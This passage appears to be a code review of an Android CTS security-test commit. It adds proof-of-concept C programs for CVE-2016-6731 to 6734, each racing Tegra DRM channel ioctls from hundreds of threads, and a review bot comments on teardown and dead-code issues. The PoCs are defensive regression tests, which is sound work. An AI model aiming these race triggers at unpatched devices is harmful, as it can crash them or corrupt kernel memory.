+	int i, try_time = TRY_TIMES, ret;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		return 0;
+	}
+
+	/* prepare ioctl cmd */
+	prepare();
+
+	/* create clk thread */
+	for(i = 0; i < CLK_THREAD_NUM; i++){
+		ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+		if(ret){
+			goto out_clk_thread;
+		}
+	}
+
+	while(try_time){
+		/* open */
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+		if(ret == 0){
+			try_time--;
+			/* set clk */
+			clk_c.context = open_c.context;
+			/* set close */
+			close_c.context = open_c.context;
+			usleep(500);
+			ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+		}
+	}
+	
+out_clk_thread:
+	/* kill clk thread */
+	for(i = 0; i < CLK_THREAD_NUM; i++){
+			pthread_kill(clk_thread_id[i], SIGKILL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
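Review bot: The `while(try_time)` loop in main decrements `try_time` only when the open-channel ioctl returns 0, so on a device where that call fails the binary never terminates and the host test has to time out with all worker threads still spinning; move `try_time--;` out of the `if(ret == 0)` block so the attempt count is bounded either way. `pthread_kill(clk_thread_id[i], SIGKILL)` ends the whole process rather than one thread, and on the `goto out_clk_thread` path it is also called for slots that were never created, so `close(fd)` and `return 0` are probably never reached and the exit status seen by the host is a signal death. A shared `volatile int stop` flag tested in `clk_thread`'s loop, followed by `pthread_join`, would give the test a defined exit. The `SIOC*`/`PRIV_*` defines and the `out_dev` label are unused, and the empty `if(ret == -1){ }` in set_affinity can go.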
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM	900
+#define TRY_TIMES	CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT	0x13
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+    volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+    volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+	__u64 context;
+	__u32 index;
+	__u32 type;
+	__u32 rate;
+	__u32 pad;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(1){
+		ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+	}
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		return 0;
+	}
+
+	/* prepare ioctl cmd */
+	prepare();
+
+	/* create clk thread */
+	for(i = 0; i < CLK_THREAD_NUM; i++){
+		ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+		if(ret){
+			goto out_clk_thread;
+		}
+	}
+
+	while(try_time){
+		/* open */
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+		if(ret == 0){
+			try_time--;
+			/* set clk */
+			clk_c.context = open_c.context;
+			/* set close */
+			close_c.context = open_c.context;
+			usleep(500);
+			ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+		}
+	}
+        puts("ran 1");
+out_clk_thread:
+	/* kill clk thread */
+	for(i = 0; i < CLK_THREAD_NUM; i++){
+			pthread_kill(clk_thread_id[i], SIGKILL);
+	}
+out_dev:
+	close(fd);
+        puts("ran 2");
+	return 0;
+}
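Review bot: The teardown loop calls `pthread_kill(clk_thread_id[i], SIGKILL)`, but SIGKILL acts on the whole process, so the first delivery ends the test binary and `close(fd)` and `puts("ran 2")` are never reached. On the `goto out_clk_thread` path after a failed `pthread_create`, the loop also passes the zero-initialised ids of threads that were never started. I would let the workers poll a flag, `while (!stop) ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);`, then set it and run `for (i = 0; i < created; i++) pthread_join(clk_thread_id[i], NULL);` over the count that was actually created. The same teardown appears in the poc.c files for CVE-2016-6732, 6733, 6734 and 6735; the first two at least guard it with `thread_ret[i]`.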
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM	900
+#define TRY_TIMES	900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+	int ret = 1;
+	set_affinity(1);
+
+	while(ret){
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+	}
+        return NULL;
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		return 0;
+	}
+
+	/* prepare ioctl cmd */
+	prepare();
+
+	/* create thread */
+	for(i = 0; i < THREAD_NUM; i++){
+		thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+	}
+
+	while(try_time--){
+		/* open */
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+		if(ret){
+		}else{
+		}
+		/* close */
+		close_c.context = open_c.context;
+
+		/* swtich to child */
+		usleep(500);
+	}
+
+out_thread:
+	/* kill thread */
+	for(i = 0; i < THREAD_NUM; i++){
+		if(!thread_ret[i]){
+			pthread_kill(thread_id[i], SIGKILL);
+		}
+	}
+
+out_close:
+	close(fd);
+	return 0;
+}
+	
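Review bot: Several constructs in this file do nothing: the empty `if(ret == -1){ }` in `set_affinity`, the empty `if(ret){ }else{ }` after the OPEN_CHANNEL ioctl in `main`, the unused global `futex_signal`, and the labels `out_thread` and `out_close`, which no `goto` targets. A failed `sched_setaffinity` or a failed open ioctl therefore leaves no trace in the test output. I would either report the failure, as the CVE-2016-6733 copy does with `printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));`, or delete the empty branches and unused names. The comment `/* swtich to child */` should read "switch".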
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
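Review bot: This header appears to be dead code, because the `poc.c` added next to it includes only system headers and redefines every macro, enum and struct declared here. It is also not self-contained: it uses `__u32`, `__u64` and `_IOWR` without including `<linux/types.h>` and `<sys/ioctl.h>`. The guard `__local_pwn_H__` starts with a double underscore, which is reserved for the implementation. I would either drop the file or make it the single home of the DRM definitions, with `#include "local_pwn.h"` in `poc.c` and a guard such as `#ifndef LOCAL_PWN_H`. The `SIOCIWFIRSTPRIV`/`PRIV_CMD_*` wireless constants are not referenced by any code visible in this commit and could go either way.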
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM	900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+		printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+	int ret = 1;
+	set_affinity(1);
+
+	while(ret){
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+	}
+        return NULL;
+}
+
+int main()
+{
+	int i, try_time = THREAD_NUM, ret;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		printf("[+] open failed %d %s\n", errno, strerror(errno));
+		return 0;
+	}
+
+	/* prepare ioctl cmd */
+	prepare();
+
+	/* create thread */
+	for(i = 0; i < THREAD_NUM; i++){
+		thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+	}
+
+	while(try_time--){
+		/* open */
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+		/* close */
+		close_c.context = open_c.context;
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+		if(ret){
+		}else{
+			open_c.context = 0UL;
+		}
+	}
+
+out_thread:
+	/* kill thread */
+	for(i = 0; i < THREAD_NUM; i++){
+		if(!thread_ret[i]){
+			pthread_kill(thread_id[i], SIGKILL);
+		}
+	}
+
+out_close:
+	close(fd);
+	return 0;
+}
+	
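Review bot: The open-failure message in `main` uses the success prefix, `printf("[+] open failed %d %s\n", ...)`, while `set_affinity` in the same file reports errors with `[-]`, and `main` then returns 0 exactly as a completed run does. If the host-side test reads the output or the exit status (not visible in this hunk), a device without `/dev/dri/renderD129` looks the same as a device that ran the test. I would change the prefix to `[-]` and add a short comment above `main` stating what outcome the harness expects on a patched device. The result of the OPEN_CHANNEL ioctl is also overwritten by the CLOSE_CHANNEL call before anything looks at it.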
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM	900
+#define TRY_TIMES	KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
